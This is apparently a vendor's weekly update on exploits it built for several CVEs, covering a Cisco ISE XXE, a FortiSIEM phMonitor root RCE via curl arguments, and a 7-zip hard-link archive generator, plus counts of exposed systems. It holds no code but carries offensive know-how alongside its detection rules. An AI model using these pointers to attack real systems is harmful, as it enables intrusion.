Happy Friday! The Initial Access Intelligence team's deliverables for the past week are as follows.
By customer request, this week the team added an exploit for CVE-2026-20029, an authenticated XXE vulnerability in Cisco Identity Services Engine (ISE) that requires administrative privileges to exploit. There are currently no public PoCs available for this vulnerability, and it is not known to be exploited in the wild. Our ASM queries find between 500 and 700 Cisco ISE systems on the internet.
Notably, this exploit has a hard limitation that is fairly common amongst out-of-band (OOB) XXE vulnerabilities: The specified file (-path) cannot be more than one line. If the specified file is more than one line, the DTD will be requested, proving the XXE, but the second request will not be made, meaning no file contents will be received. The exploit comes with PCAPs, ASM queries, and network rules.
The team added an exploit for a vulnerability in Fortinet FortiSIEM's phMonitor service, which is exposed on port 7900 on all network interfaces by default. In our exploit, the team leveraged curl arguments to gain arbitrary write access as an admin, which in turn allowed us to achieve remote code execution as root. In our testing, public exploit code required modification in order to run successfully. CVE-2025-64155 was added to VulnCheck KEV on January 15, 2026; it is not yet on CISA KEV. Our exploit comes with network rules and PCAPs.
The team developed a 7-zip file generator to exploit CVE-2025-11001, an arbitrary file write, on extraction. This exploit requires that the user be running 7-zip as an administrator in order to leverage incorrect handling of hard-links on Windows, which we believe reduces the vulnerability's real-world impact. The team delivered an exploit generator that achieves RCE on file extraction and a Sigma rule for detecting extraction of potentially malicious zip files.
The team added ASM queries for CVE-2026-20045, a freshly disclosed zero-day code injection vulnerability in multiple Cisco communications products. Affected products include Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance. The team's queries look for potentially vulnerable Cisco Unified CM instances; Censys shows fewer than 10 of these online, while Shodan and FOFA find between 150 and 500.